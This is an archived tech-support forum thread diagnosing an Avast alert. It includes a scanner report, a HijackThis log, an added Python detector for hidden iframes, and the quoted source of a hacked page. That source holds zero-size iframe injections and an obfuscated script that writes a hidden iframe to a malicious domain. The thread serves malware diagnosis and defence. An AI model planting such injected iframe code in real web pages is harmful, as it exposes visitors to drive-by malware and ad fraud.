Virus not being found by scan question...

I have run a scan several times, but cannot seem to find the source of this virus that continues to pop up on my computer. Avast comes up and says that the File name is http://www.goasks.com/ads.htm… Malware name: HTML:Iframe-inf… Malware type: Virus/Worm… VPS version: 090413-0, 04/13/2009. The avast warning comes up at least 15 times a day and I do not know how to delete it. Can anyone help me??

Welcome to the forum.

It sounds like it’s the webscanner telling you that the website you’re visiting has a mis-formed iframe tag in it.

Are you visiting a website when this pops up?

It is basically saying this site has been hacked or has malicious content; that particular page is just chock-a-block with iframe tags, with at least one going to a suspect/malicious site.

It also uses obfuscation to try and hide one site that it is connecting to, which in its own right makes me suspicious.

Hi turtlegk33,

The Bad Stuff Detektor came up with the following report:

Zeroiframes detected: 36
Check took 64.33 seconds

(Level: 0) Url checked:
hxxp://www.goasks.com/ads.htm
Advpoints code detected! (iframe cheater)
Zeroiframes detected on this site: 11

(Level: 1) Url checked: (iframe source)
hxxp://www.searchbizs.com/myport.php?ref=801006
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.searchbizs.com/portal/portal1.php?ref=801006
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.onlinebizs.com/myport.php?ref=1187
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.onlinebizs.com/portal/portal1.php?ref=1187
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.abcseeking.com/myport.php?ref=7676
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.abcseeking.com/portal/portal1.php?ref=7676
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.abczones.com/myport.php?ref=vg30
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.abczones.com/portal/portal1.php?ref=vg30
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.abcwant.com/myport.php?ref=6767
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.abcwant.com/portal/portal1.php?ref=6767
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.xmlsee.com/myport.php?ref=utad49
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.xmlsee.com/portal/portal1.php?ref=utad49
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.advpoints.com/promote15.php?uid=11278
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.eseekz.com/ppc.php?username=skpc
Zeroiframes detected on this site: 4
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.hitreap.com/search.php?username=jack&keywords=safety+glasses&abcwords=currency+trading
Zeroiframes detected on this site: 4
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.hitreap.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.hitreap.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.hitreap.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.hitreap.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.eseekz.com/search.php?username=skpc&keywords=heroin+detox&abcwords=credit+card+debt
Zeroiframes detected on this site: 4
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://thebighits.com/?id=e2061
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.resultsz.com/search/anticheat.php?username=hadit777&s=e2061&type=2
Zeroiframes detected on this site: 2
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.theshoppingdirect.com/?keywords=florist+flower
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.seekingdirect.com/index.php?username=akuler&k=caviar
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
hxxp://s10.histats.com/js9.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://s+st_dominio+.histats.com/stats/0.php?+send_vars+&
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://s+st_dominio+.histats.com/stats/+s_sid+.php?+send_vars+&
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://host.justppc.net/search/a.php?aff=8819
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://host.justppc.net/b.php
Advpoints code detected! (iframe cheater)
Zeroiframes detected on this site: 3

(Level: 3) Url checked: (iframe source)
hxxp://j10.justppc.net/sea.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://j10.justppc.net/cgi-bin/search/search.cgi?keywords=structured+settlement&username=xiaoke
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://j10.justppc.net/g1.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://j29.justppc.net/sea.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://j29.justppc.net/cgi-bin/search/search.cgi?keywords=meridia&username=17888
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://j29.justppc.net/g1.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.advpoints.com/promote15f.php?uid=10509
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (iframe source)
hxxp://www.advpoints.com/itsptp.html
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 5) Url checked: (script source)
hxxp://www.advpoints.com/rollover.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 5) Url checked: (script source)
hxxp://www.google-analytics.com/urchin.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (iframe source)
hxxp://www.advpoints.com/promote.php?uid=10509
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://feedsearchs.com/portal/?ref=20tra
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (frame source)
hxxp://feedsearchs.com/portal/a.php
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://i-e-search.com/portal/?ref=3
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://i-e-search.com/portal/a.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://i-e-search.com/portal/portal.php?ref=3
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (frame source)
hxxp://feedsearchs.com/portal/portal.php?ref=20tra
Zeroiframes detected on this site: 0
No ad codes identified


Source code of submitted URL:
<iframe width="0" height="0" scrolling=no src="hxxp://www.searchbizs.com/myport.php?ref=801006"></iframe>
<iframe width="0" height="0" scrolling=no src="hxxp://www.onlinebizs.com/myport.php?ref=1187"></iframe>
<iframe width="0" height="0" scrolling=no src="hxxp://www.abcseeking.com/myport.php?ref=7676"></iframe>
<iframe width="0" height="0" scrolling=no src="hxxp://www.abczones.com/myport.php?ref=vg30"></iframe>
<iframe width="0" height="0" scrolling=no src="hxxp://www.abcwant.com/myport.php?ref=6767"></iframe>
<iframe src="hxxp://www.xmlsee.com/myport.php?ref=utad49" width="0" height="0" scrolling=no"></iframe>
<iframe width=0 height=0 src='hxxp://www.advpoints.com/promote15.php?uid=11278' frameborder=0 marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<iframe src="hxxp://www.eseekz.com/ppc.php?username=skpc" width="0" height="0" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>
<iframe src="hxxp://thebighits.com/?id=e2061" width="0" height="0" border="0" scrolling=no></iframe>
<script type=text/javascript>
a3="3000";
a1='http://';
a2='be';
c_b = a1 + a2 + 'e8' + '.info/' + 'm.php?p=' + a3;
document.write('<if' + 'rame src="' + c_b + '" width=1"'+'" height=1"'+'" frameborder="0" scrolling="no"></if'+'rame>');
</script>
<iframe src=hxxp://host.justppc.net/search/a.php?aff=8819 width=0 height=0></iframe>
<IFRAME src="hxxp://feedsearchs.com/portal/?ref=20tra" width=0 height=0 scrolling=no></IFRAME>

Obvious verdict I think,

polonus
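An added illustration, not code from the thread and not the Bad Stuff Detektor itself: a small Python checker that flags the zero-size iframes in the page source quoted above and folds the split-string document.write() trick back into the URL it hides. The sample HTML is constructed from the quoted source with URLs kept defanged (hxxp), and the hidden-iframe threshold (0 or 1 px on either side) is this example's own choice.

```python
import re
from html.parser import HTMLParser

# Constructed sample modelled on the source quoted in the thread; URLs stay
# defanged (hxxp), including the script's 'http://' fragment.
SAMPLE_HTML = """
<iframe width="0" height="0" scrolling=no src="hxxp://www.searchbizs.com/myport.php?ref=801006"></iframe>
<iframe src="hxxp://www.eseekz.com/ppc.php?username=skpc" width="0" height="0" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>
<iframe src="hxxp://example.invalid/player" width="640" height="360"></iframe>
<script type=text/javascript>
a3="3000";
a1='hxxp://';
a2='be';
c_b = a1 + a2 + 'e8' + '.info/' + 'm.php?p=' + a3;
document.write('<if' + 'rame src="' + c_b + '" width=1"'+'" height=1"'+'" frameborder="0" scrolling="no"></if'+'rame>');
</script>
"""

TOKEN_RE = re.compile(r"'[^']*'|\"[^\"]*\"|[A-Za-z_]\w*")  # string literal or name
ASSIGN_RE = re.compile(r"^\s*(?:var\s+)?([A-Za-z_]\w*)\s*=\s*(.+?);?\s*$")
DOCWRITE_RE = re.compile(r"document\.write\((.+)\)\s*;?\s*$")

def px(value):
    """Leading integer of a size attribute ('0', '640px'), else None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None

def eval_concat(expr, env):
    """Fold a '+'-joined chain of string literals and known variables into one
    string; None if the expression uses anything else (calls, unknown names)."""
    parts = [tok[1:-1] if tok[0] in "'\"" else env.get(tok) for tok in TOKEN_RE.findall(expr)]
    return None if None in parts else "".join(parts)

def deobfuscate_writes(script):
    """Resolve constant assignments line by line and return every string the
    script hands to document.write(), i.e. the markup it would inject."""
    env, written = {}, []
    for line in script.splitlines():
        if m := DOCWRITE_RE.search(line):
            if (value := eval_concat(m.group(1), env)) is not None:
                written.append(value)
        elif m := ASSIGN_RE.match(line):
            if (value := eval_concat(m.group(2), env)) is not None:
                env[m.group(1)] = value
    return written

class IframeAudit(HTMLParser):
    """Records each iframe as (src, hidden) and buffers script bodies."""
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._buf = []
        elif tag == "iframe":
            a = dict(attrs)
            w, h = px(a.get("width")), px(a.get("height"))
            # Invisible when either dimension is 0 or 1 px (the 'zeroiframes').
            hidden = w is not None and h is not None and (w <= 1 or h <= 1)
            self.iframes.append((a.get("src", ""), hidden))

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))  # body can arrive in chunks
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

def audit(html, via_script=False):
    """(src, verdict) for every iframe in the markup and, on the first pass, for
    iframes in the markup its scripts would document.write() into the page."""
    p = IframeAudit()
    p.feed(html)
    p.close()
    tag = "+document.write" if via_script else ""
    out = [(src, ("hidden" if hidden else "visible") + tag) for src, hidden in p.iframes]
    if not via_script:
        for script in p.scripts:
            for markup in deobfuscate_writes(script):
                out += audit(markup, via_script=True)
    return out
```

Running audit(SAMPLE_HTML) lists the two zero-size frames, the one visible frame, and the 1x1 frame that the script assembles at runtime with its resolved destination.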

Thanks for the welcome…

It does come up when I am visiting websites, but it also comes up quite frequently when I have iTunes up and am listening to music and sometimes I am not doing anything on the computer but when I come back to the computer three or four may have come up…

What does what the Bad Stuff Detektor said actually mean… sorry

Hi turtlegk33,

These were the results of a specific scanner I use, where one can scan a specific URL against IFrame hacks in particular. I scanned the URL you gave to come up with the foregoing results. The man who developed this scanner called it the Bad Stuff Detektor; his name is Jukaty.

polonus

Is there anything I can do to stop this from continually popping up?

Do a scan with Hijack This. Be sure to click “Do a system scan and save a logfile”. When the log appears, copy the text in the notepad document and paste it in your next post. Then we can see if you have any “HIDDEN” processes that are trying to connect to that site.

If you don’t have Hijack This, download it here: http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download

Help us so we can help you.

First half of info:…

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:45:13 PM, on 4/21/2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Apoint\Apoint.exe
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Symantec AntiVirus\VPTray.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\sttray.exe
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Lexmark 1200 Series\LXCZbmgr.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Program Files\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Program Files\BOINC\boinctray.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\AIM6\aim6.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\RocketDock\RocketDock.exe
C:\Program Files\BOINC\boincmgr.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Lexmark 1200 Series\lxczbmon.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\Dell\QuickSet\quickset.exe
C:\Program Files\Apoint\ApMsgFwd.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Apoint\Apntex.exe
C:\Program Files\Apoint\HidFind.exe
C:\Program Files\BOINC\boinc.exe
C:\Program Files\AIM6\aolsoftware.exe
C:\ProgramData\BOINC\projects\www.worldcommunitygrid.org\wcg_faah_autodock_6.07_windows_intelx86
C:\ProgramData\BOINC\projects\www.worldcommunitygrid.org\wcg_faah_autodock_6.07_windows_intelx86
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Windows Live\Toolbar\wltuser.exe
C:\Windows\System32\regsvr32.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.westminster.edu/?page=current
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer provided by Dell
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
O1 - Hosts: ::1 localhost
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: ContributeBHO Class - {074C1DC5-9320-4A9A-947D-C042949C6216} - C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Search Helper - {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O2 - BHO: cpmsky browser enhancer - {B3E68FB2-BFC4-6990-21C4-2C2D28DF79CE} - C:\Windows\system32\qqeckpckcni.dll
O2 - BHO: Browser Address Error Redirector - {CA6319C0-31B7-401E-A518-A07C3DB8F777} - C:\Program Files\BAE\BAE.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: Windows Live Toolbar Helper - {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} - C:\Program Files\Windows Live\Toolbar\wltcore.dll
O2 - BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O3 - Toolbar: Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll
O3 - Toolbar: &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint\Apoint.exe
O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [Performance Center] C:\Program Files\Ascentive\Performance Center\APCMain.exe -m
O4 - HKLM\..\Run: [MSConfig] "C:\Windows\system32\msconfig.exe" /auto
O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
O4 - HKLM\..\Run: [SigmatelSysTrayApp] sttray.exe
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [NVHotkey] rundll32.exe C:\Windows\system32\nvHotkey.dll,Start

Second half:…


O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [lxczbmgr.exe] "C:\Program Files\Lexmark 1200 Series\lxczbmgr.exe"
O4 - HKLM\..\Run: [FaxCenterServer] "C:\Program Files\Lexmark Fax Solutions\fm3032.exe" /s
O4 - HKLM\..\Run: [AdobeCS4ServiceManager] "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
O4 - HKLM\..\Run: [Adobe Acrobat Speed Launcher] "C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe"
O4 - HKLM\..\Run: [Acrobat Assistant 8.0] "C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe"
O4 - HKLM\..\Run: [Adobe_ID0ENQBO] C:\PROGRA~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [boinctray] "C:\Program Files\BOINC\boinctray.exe"
O4 - HKLM\..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s "C:\Windows\system32\qqeckpckcni.dll"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [Aim6] "C:\Program Files\AIM6\aim6.exe" /d locale=en-US ee://aol/imApp
O4 - HKCU\..\Run: [AIM] C:\Program Files\AIM95\aim.exe -cnetwait.odl
O4 - HKCU\..\Run: [updateMgr] C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe AcRdB7_0_5
O4 - HKCU\..\Run: [XNeat Windows Manager] C:\Program Files\XNeat Windows Manager\xnViewer.exe /h
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe"
O4 - HKCU\..\Run: [boincmgr] "C:\Program Files\BOINC\boincmgr.exe" /a /s
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - Global Startup: Digital Line Detect.lnk = C:\Program Files\Digital Line Detect\DLG.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: QuickSet.lnk = ?
O8 - Extra context menu item: Append Link Target to Existing PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Append to Existing PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert Link Target to Adobe PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
O9 - Extra button: Blog This - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: &Blog This in Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
O9 - Extra button: AOL Instant Messenger (TM) - {AC9E2541-2814-11d5-BC6D-00B0D0A1DE45} - C:\PROGRA~1\AIM95\aim.exe (file missing)
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IMVU\Run IMVU.lnk (file missing)
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O13 - Gopher Prefix: 
O16 - DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} (DivXBrowserPlugin Object) - http://download.divx.com/player/DivXBrowserPlugin.cab
O16 - DPF: {DB7BF79A-FC51-4B5A-92BC-A65731174380} (InstantAction Game Launcher) - http://www.instantaction.com/download/iaplayer.cab
O23 - Service: Adobe Version Cue CS4 - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - C:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: lxcz_device -   - C:\Windows\system32\lxczcoms.exe
O23 - Service: Dell Internal Network Card Power Management (nicconfigsvc) - Dell Inc. - C:\Program Files\Dell\QuickSet\NicConfigSvc.exe
O23 - Service: SAVRoam (SavRoam) - symantec - C:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: stllssvr - Unknown owner - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe (file missing)
O23 - Service: Symantec AntiVirus - Symantec Corporation - C:\Program Files\Symantec AntiVirus\Rtvscan.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe

--
End of file - 13628 bytes

As seen from your HJT logfile txt, these two entries could be fixed:
O2 - BHO: cpmsky browser enhancer - {B3E68FB2-BFC4-6990-21C4-2C2D28DF79CE} - C:\Windows\system32\qqeckpckcni.dll

Unknown application. Re: http://www.daniweb.com/forums/thread145193.html

O4 - HKLM\..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s "C:\Windows\system32\qqeckpckcni.dll" Nasty

This seems legit, but can you upload it to virustotal.com: xnViewer.exe
